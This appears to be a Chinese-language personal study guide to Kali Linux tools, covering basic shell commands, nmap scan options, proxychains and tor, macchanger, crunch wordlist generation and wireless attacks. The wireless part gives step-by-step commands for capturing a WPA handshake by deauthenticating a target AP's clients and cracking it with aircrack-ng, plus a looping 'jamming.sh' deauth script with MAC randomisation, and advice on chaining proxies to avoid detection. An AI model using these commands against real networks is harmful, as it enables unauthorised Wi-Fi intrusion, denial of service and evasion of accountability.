kali linux虚拟机一键安装方式

基本命令

cd 进入目录
ls 列出当前目录下文件,ls+la 列出文件的rwx
pwd 显示当前目录
cp 复制文件 cp test.txt /root 复制test.txt文件到root目录下
mv 移动文件,改名
cat 查看文档中的内容 ,cat +test | grep test 抓取有test内容文件
less 查看文件内容
grep 抓取内容
echo 不是很懂,就拿来在文本中添加内容 echo “test”>> test (一个>替换)
touch 就当是快速创建文档了 touch +文件1 文件2 文件3
mkdir 创建文件夹
chown 将某个文件的拥有者设为谁的使用者,不是很懂
chmod 修改权限rwx
rm 删除文件,rm -r 删除整个目录
nano 编辑文本(crtl+o输出)
vi/vim 编辑文本
man 查看指令帮助,配置文件帮助编程帮助等
xrandr -s 1280×800
“1024×768” “1280×960” “1152×864” “800×600”

nmap/zenmap

nmap和zenmap的功能如下

1.主机发现(Host Discovery)
2.端口扫描(Port Scanning)
3.版本侦测(Version Detection)
4.操作系统侦测(Operating System Detection)

Nmap(Network Mapper)

nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪
些服务运行在哪些连接端,并且推断计算机运行哪个操作系统

nmap –help 帮助
nslookup scanme.nmap.org 查找ip
nslookup 45.33.32.156 应该能找出域名
nslookup 45.33.32.156 >>results.txt 找到的信息储存在txt文件中
nmap scanme.nmap.org 可以看打开的端口
nmap -oG – 192.168.1.0-255 -vv > /root/Desktop/results 扫描0-255并
在桌面生成文件

nmap –T4 –A –v 目标主机 全面扫描
-A选项用于使用进攻性(Aggressive)方式扫描;
-T4指定扫描过程使用的时序(Timing),总有6个级别(0-5),级别越高,
扫描速度越快,但也容易被防火墙或IDS检测并屏蔽掉,在网络通讯状况良好
的情况推荐使用T4;
-v表示显示冗余(verbosity)信息,让用户了解当前的扫描状态。

Zenmap(nmap的可视化界面)

一、Intense scan (nmap -T4 -A -v)
-T4 加快执行速度
-A 操作系统及版本探测
-v 显示详细的输出
二、Intense scan plus UDP(nmap -sS -sU -T4 -A -v)
-sS TCP SYN 扫描
-sU UDP 扫描
三、Intense scan,all TCP ports(nmap -p 1-65536 -T4 -A -v)
扫描所有TCP端口,范围在1-65535,扫描所有端口的开放情况,速度慢。
-p 指定端口扫描范围
四、Intense scan,no ping(nmap -T4 -A -v -Pn)
-Pn 非ping扫描
五、Ping scan(nmap -sn)
速度快,易被防火墙屏蔽,导致无扫描结果
-sn ping扫描
六、Quick scan(nmap -T4 -F)
-F 快速模式。
七、Quick scan plus(nmap -sV -T4 -O -F –version-light)
-sV 探测端口及版本服务信息。
-O 开启OS检测
–version-light 设定侦测等级为2。
八、Quick traceroute(nmap -sn –traceroute)
路由跟踪
-sn Ping扫描,关闭端口扫描
-traceroute 显示本机到目标的路由跃点。
九、Regular scan
规则扫描
十、Slow comprehensive scan
(nmap -sS -sU -T4 -A -v -PE -PP -PS80,443,-PA3389,PU40125 -PY -g 53 –script all)
慢速全面扫描。

-sL: List Scan 列表扫描,仅将指定的目标的IP列举出来,不进行主机发现。

-sn: Ping Scan 只进行主机发现,不进行端口扫描。

-Pn: 将所有指定的主机视作开启的,跳过主机发现的过程。

-PS/PA/PU/PY[portlist]: 使用TCPSYN/ACK或SCTP INIT/ECHO方式进行发现。

-PE/PP/PM: 使用ICMP echo, timestamp, and netmask 请求包发现主机。-PO[protocollist]: 使用IP协议包探测对方主机是否开启。

-n/-R: -n表示不进行DNS解析;-R表示总是进行DNS解析。

–dns-servers <serv1[,serv2],…>: 指定DNS服务器。

–system-dns: 指定使用系统的DNS服务器

–traceroute: 追踪每个路由节点

proxychains 、tor (让自己在网络上保持匿名)

每次我们向目标目标发送数据包时,该数据包都包含IP头中的IP地址。当我们建立TCP连
接时,目标系统将在记录所有连接时记录我们的IP地址。如果我们引发任何安全警报或警
报,我们的IP地址将被记录。所有这些事件都增加了检测的可能性。
为了以最少的检测机会进行匿名访问,我们需要使用中间机器,其IP地址将保留在目标系
统上。这可以通过使用代理来完成。如果我们在链中串起多个代理,我们的原始IP地址将
难以被检测到
一、找到代理链的存放位置
locate proxycahins

proxychains位于/ usr / bin目录中。/ usr / bin在我们的PATH变量中,我们可以在任何
目录中使用它。
二、proxychains语法
proxychains <要代理的命令><任何参数>
例:proxychains nmap -sS <IP地址>
三、设置配置文件
文件存放目录/etc/proxychains.conf
用文件编辑器(vi,vim,nano,leafpad等)编辑,在最后一行的代理是默认的tor代理,但
是似乎不能用了,所以在最后一行添加一些免费代理做测试(添加时候tab键隔开),当然有
些也是不能用的,使用时会一直出现timeout,当出现ok时候说明该代理可以用,时间应
该比较短暂,仅限测试,当在使用时候找到可以用的代理的时候可以停止回到编辑模式将
没用的代理注释(#)掉或删除
四、代理链模式
dynamic_chain strict_chain random_chain
dynamic_chains能实现我们的代理的动态链接,允许更大的匿名性
random_chain能从我们的代理链列表中随机选择ip,使得从源头跟踪流量变得困难

macchanger(更改mac地址,改的只是让别人看到的mac)

macchanger –help查看帮助
macchanger -s eth0
macchanger -a eth0 改为随机同类mac
macchanger -p eth0重置mac
macchanger –m 自己编的mac地址 eth0

eth0 网卡
mac 六组十六进制规则
sql injection是一种获取访问权并破坏网站的方法

crunch用所给字符创建密码表(wordlists)

基本使用方法crunch min max charset

min最短字符数
max最长字符数
charset包含的字符,它不是必须的,但是如果用的话要按一定的顺序书写(小写字母,
大写字母,数字,符号)

该命令将所写入的字符组合生成一个列表长度从min到max

-b:单词列表的最大大小,要有-o START
-c:写入单词列表的行数,要有 -o START
-d:限制重复字符数
-e:在生成某些单词时停止
-f:从charset.lst文件中指定字符列表
-i:反转单词列表中字符的顺序
-l:在使用-t时候,让@,%^做回自己,不表示小写大写数字特殊字符
-o :输出单词列表文件
-p:字符串按照顺序排列(不能与-s一起使用)
-q:与-p选项类似,它从指定文件中读取字符串
-r:继续之前动作(不能与-s一起使用)
-s :指定所给定的字符串作为开头创建单词列表
-t:生成特定格式单词表
-z 的特定模式:压缩输出单词列表文件,要有-o

在需要生成特定格式的密码时
@表示小写字母
,表示大写字母
%表示数字
^表示特殊字符

举例:
(1)crunch 5 5 abcde39 -t @@@39 -d 2@ -o test.txt
解释:5 5表示密码长度为5(最短到最长都是5所以长度为5)
-t 后面的@@@39为生成的密码格式,39前面三个小写字母
-d 2@ 表示小写字母限制出现两个
-o 表示生成叫test.txt的文件
(2)crunch 3 3 iret23 -s i2t -c 20 -d 1@ 1% -b 1mb -o START
解释:-s i2t 这将成为生成的密码表的第一个密码
-c 20 打印上限20行(每个文件里面)
-d 1@ 1% 限制字母数字不重复
-b 1mb 最大打印出1mb大小的文件
(3)crunch 2 4 -p cat dog pig >>test.txt
解释:-p cat dog pig 三个字符串组合成密码
(4) crunch 6 6 -t @^28%3 -l x^xxxx -o test.txt
解释:-t @^28%3 本应该是以小写字母特殊字符28数字3 的格式输出,但是有了
-l 使得@ ^ %不代表其他东西,而表示本身
x^xxxx 是控制格式的没有实际含义
从a到z输出

aircrack-ng(网络软件套件,包括探测器,数据包嗅探器,WEP和WPA / WPA2-PSK )

由于b站的政策关于暴力破解的视频不能发布,所以大家只能看文字版了

一、准备网络配适器(无线网卡)
我用了3070
二、kill掉影响无线网卡的进程
airmon-ng check kill
三、开启监听模式
airmon-ng start wlan0
我的网卡名字叫wlan0,可以通过iwconfig查看
四、捕获周围流量
airodump-ng wlan0mon
在开启监听模式之后名字就变了
五、找到我们的目标AP,只关注它
airodump-ng -c 1 – w test –bssid 11:22:33:44:55:66 wlan0mon
11:22:33:44:55:66是目标的mac地址
-c 后面的1是频道数,体现在终端里面是CH下面对应的数字
六、进行身份验证
aireplay-ng –deauth -0 0 -a 11:22:33:44:55:66 wlan0mon
-0 0 -a 指的是无限向目标AP发送身份验证
七、抓包握手
上一把将连接该wifi的用户全部挤下去,当他们重新连接进行身份验证时,airodump-
ng尝试在新的四次握手中获取密码
八、创造密码字典开始crack
crunch 8 8 abcde123 -d @2 1% -t %%%@@@@@ | aircrack-ng -w – test-01.cap -e
xxxx

-e后面是AP的名称

aireplay-ng(拥堵网络)

nano jamming.sh
whlie true
do
aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon
ifconfig wlan0mon down
macchanger -r wlan0mon | grep "New MAC"
iwconfig wlan0mon mode monitor
ifconfig wlan0mon up
iwconfig waln0mon | grep Mode
sleep 5
echo loading...
done

类似于.bat的文件。

添加权限

chomd +x jamming.sh

改变网卡的频道到1

iwconfig wlan0mon channel 1
./jamming.sh

运行。

sslstrip

攻击者选择攻击目标。之后,他们通过使其媒体访问控制(MAC)地址与路由器相同来欺骗自己作为无线接入点出现。虽然它们看起来像是路由器,但它们会向请求其数据包的客户端/目标发送数据包,从而创建MITM拓扑。

然后,客户端将请求转发给攻击者,攻击者接收请求并从服务器为客户端检索请求。收到它后,SSL层将被剥离,页面将被发送到目标。受害者然后在不知不觉中将他们的数据包转发给攻击者,同时从中挑选出他们的私人信息。SSL Strip将SSL层重新打开,填充并将其发送到服务器。除了攻击者获取他们想要的信息之外,服务器和客户端的一切看起来都很好。

/proc/sys/net/ipv4/ip_forward
里面的0代表禁止数据包转发,1表示允许